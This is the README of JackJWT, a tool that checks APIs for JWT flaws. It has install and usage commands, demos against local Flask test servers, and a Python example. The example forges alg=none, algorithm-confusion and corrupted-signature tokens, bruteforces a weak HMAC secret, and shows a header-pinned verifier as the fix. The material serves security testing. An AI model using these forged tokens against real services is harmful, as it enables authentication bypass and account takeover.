kozlm/jackjwt

JackJWT - JWT Security Checker

Installation

To install the tool, clone the repository from GitHub, install the required dependencies, and run the script with the -h flag to verify that the installation works. Either of the two invocations below is valid (as a module or as a script):

git clone https://github.com/kozlm/jackjwt.git
cd jackjwt
pip install -r requirements.txt
python -m src.jackjwt -h
python src/jackjwt.py -h

You should see a help message showing all application options:

usage: jackjwt.py [-h] -u URL -t TOKEN [-w CLAIMS_WORDLIST] [-n] [-f] [-s SECRET_WORDLIST] [-c PUBLIC_KEY] [-v]

JackJWT - JWT Security Checker

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     API endpoint URL
  -t TOKEN, --token TOKEN
                        JWT token
  -w CLAIMS_WORDLIST, --claims-wordlist CLAIMS_WORDLIST
                        Custom wordlist with potentially vulnerable claims
  -n, --none-alg        Use 'None' algorithm attack
  -f, --no-verify       Check no signature verification
  -s SECRET_WORDLIST, --secret-wordlist SECRET_WORDLIST
                        Path to wordlist for JWT secret bruteforce
  -c PUBLIC_KEY, --public-key PUBLIC_KEY
                        Path to public key for algorithm confusion attack
  -v, --verbose         Enable verbose output

Usage

To run the tool, provide a sample JWT or a path to a file containing the token (-t), and the URL of a sample GET endpoint (-u) that returns status 200 when called with that token. The URL is always required, even though not every test sends a request (the secret bruteforce runs entirely offline). The tool first inspects the token's payload and reports any claim whose name appears in a wordlist of potentially sensitive or vulnerable fields (e.g., api_token, is_admin). You can provide your own wordlist with the -w flag.

Additional vulnerability checks include:

  • No signature verification (-f) – sends the token with a corrupted signature; a 200 response means the endpoint never checks it.
  • None algorithm usage (-n) – sets alg to None, drops the signature and sends the unsigned token.
  • Algorithm confusion (-c) – re-signs the token with HS256 using the server's RSA public key (PEM) as the HMAC secret; this succeeds when the server lets the token header choose the algorithm.
  • Weak secret (HMAC bruteforce) (-s) – tries each entry of the wordlist as the HMAC secret locally, without sending any requests.

The -v flag enables verbose output.
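The four checks above, and the claims-wordlist scan, boil down to a few token manipulations that can be demonstrated offline. The following is an added example written for this page, not JackJWT's own code: it builds an HS256 token, runs the claims scan, forges the three attack tokens (corrupted signature, alg=none, HS256-with-public-key), bruteforces the secret, and then shows a verifier that trusts the header algorithm (the server-side mistake that makes -n and -c work) next to one that pins the algorithm. The secret, the PEM text standing in for api/keys/public.pem, the claim and secret wordlists and the sample token are all constructed for the example; the PEM does not need to be a real RSA key, because the confusion attack only uses its bytes.

```python
"""Offline JWT checks in the spirit of JackJWT (added example, not the project's code).

Standard library only. The secret, PEM text, wordlists and token below are
constructed for this example; the PEM is just the text a server would load from
public.pem, and the confusion attack needs only its bytes, not a real RSA key.
"""
import base64
import hashlib
import hmac
import json

SAMPLE_SECRET = b"secret123"  # constructed weak HMAC secret
SAMPLE_PUBLIC_PEM = (         # constructed stand-in for api/keys/public.pem
    b"-----BEGIN PUBLIC KEY-----\nEXAMPLEONLYnotARealKey\n-----END PUBLIC KEY-----\n"
)
SENSITIVE_CLAIMS = ["api_token", "is_admin", "role", "password"]   # stand-in for the -w wordlist
SECRET_WORDLIST = ["password", "changeme", "secret", "secret123"]  # stand-in for the -s wordlist


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def hs256_sign(signing_input: str, key: bytes) -> str:
    return b64url_encode(hmac.new(key, signing_input.encode(), hashlib.sha256).digest())


def make_hs256_token(payload: dict, key: bytes) -> str:
    head, body = encode_part({"alg": "HS256", "typ": "JWT"}), encode_part(payload)
    return f"{head}.{body}.{hs256_sign(f'{head}.{body}', key)}"


def split_token(token: str):
    head, body, sig = token.split(".")
    return json.loads(b64url_decode(head)), json.loads(b64url_decode(body)), sig


def hs256_verify(token: str, key: bytes) -> bool:
    head, body, sig = token.split(".")
    return hmac.compare_digest(hs256_sign(f"{head}.{body}", key), sig)


def find_sensitive_claims(token: str, wordlist=SENSITIVE_CLAIMS) -> list:
    """Claim names from the wordlist that occur in the payload (the claims scan)."""
    _, payload, _ = split_token(token)
    return [name for name in wordlist if name in payload]


def forge_invalid_signature(token: str) -> str:
    """Corrupt the signature; a 200 from the API means it was never checked (-f)."""
    head, body, sig = token.split(".")
    raw = bytearray(b64url_decode(sig))
    raw[0] ^= 0xFF
    return f"{head}.{body}.{b64url_encode(bytes(raw))}"


def forge_none(token: str, claims: dict) -> str:
    """Set alg=none, change claims and drop the signature (-n)."""
    header, payload, _ = split_token(token)
    header["alg"] = "none"
    payload.update(claims)
    return f"{encode_part(header)}.{encode_part(payload)}."


def forge_confusion(token: str, public_pem: bytes, claims: dict) -> str:
    """Re-sign with HS256 using the RSA public key bytes as the HMAC secret (-c)."""
    header, payload, _ = split_token(token)
    header["alg"] = "HS256"
    payload.update(claims)
    head, body = encode_part(header), encode_part(payload)
    return f"{head}.{body}.{hs256_sign(f'{head}.{body}', public_pem)}"


def bruteforce_secret(token: str, candidates):
    """Offline dictionary attack on an HS256 token (-s); returns the secret or None."""
    for cand in candidates:
        if hs256_verify(token, cand.encode()):
            return cand.encode()
    return None


def verify_trusting_header(token: str, key_material: bytes) -> bool:
    """Vulnerable verifier: the token header picks the algorithm. alg=none is accepted
    outright, and HS256 is checked with whatever key the server loaded, even an RSA
    public key. RS256 itself is omitted here because it needs an RSA library."""
    header, _, _ = split_token(token)
    if header.get("alg") == "none":
        return True
    if header.get("alg") == "HS256":
        return hs256_verify(token, key_material)
    return False


def verify_pinned(token: str, key: bytes) -> bool:
    """Hardened verifier: the algorithm (HS256 here) is server configuration, never header input."""
    header, _, _ = split_token(token)
    return header.get("alg") == "HS256" and hs256_verify(token, key)


if __name__ == "__main__":
    token = make_hs256_token({"sub": "alice", "is_admin": False}, SAMPLE_SECRET)
    print("sensitive claims:", find_sensitive_claims(token))
    none_token = forge_none(token, {"is_admin": True})
    print("alg=none accepted by weak verifier:", verify_trusting_header(none_token, SAMPLE_PUBLIC_PEM))
    confused = forge_confusion(token, SAMPLE_PUBLIC_PEM, {"is_admin": True})
    print("confusion accepted by weak verifier:", verify_trusting_header(confused, SAMPLE_PUBLIC_PEM))
    print("confusion accepted by pinned verifier:", verify_pinned(confused, SAMPLE_SECRET))
    print("recovered secret:", bruteforce_secret(token, SECRET_WORDLIST))
```

JackJWT sends the forged tokens to the -u endpoint and reports a finding when the response is still 200; this example stops at constructing them and checking them against the two verifiers. The fix on the server side is the one verify_pinned shows: take the algorithm and the key type from configuration, reject any header whose alg differs, and never let key material loaded for RS256 be used as an HMAC secret.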

Project Structure

Directories

  • src – source code
  • wordlist – wordlists for JWT claims and secret bruteforce
  • api – test APIs, keys, and a helper script for fetching tokens

Testing and Examples

Test APIs built with Flask were used for demonstration.

Weak Secret and No Verification

Test API: api/app.py

Command:

python -m src.jackjwt -u http://127.0.0.1:5000/protected -t <token> -nf -s wordlists/vulnerable-fields.txt

None Algorithm

Test API: api/app_none.py

Command:

python -m src.jackjwt -u http://127.0.0.1:5000/protected -t <token> -nf

Algorithm Confusion

Test API: api/app_confusion.py

Command:

python -m src.jackjwt -u http://127.0.0.1:5000/protected -t <token> -c api/keys/public.pem

Verbose Mode

Command:

python -m src.jackjwt -u http://127.0.0.1:5000/protected -t <token> -c api/keys/public.pem -v
